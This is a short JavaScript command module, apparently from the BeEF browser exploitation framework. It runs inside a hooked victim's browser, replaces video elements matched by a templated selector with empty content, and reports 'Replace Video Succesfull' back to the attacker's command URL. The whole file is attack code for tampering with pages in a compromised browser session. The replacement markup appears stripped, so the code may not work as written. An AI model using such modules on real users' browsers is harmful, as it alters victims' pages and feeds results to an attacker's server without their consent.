beef.execute(function() { $j('<%= @jquery_selector %>').each( function ( intIndex ) { var width = $j(this).css('width'); var height = $j(this).css('height'); $j(this).replaceWith(''); } ) beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Succesfull"); });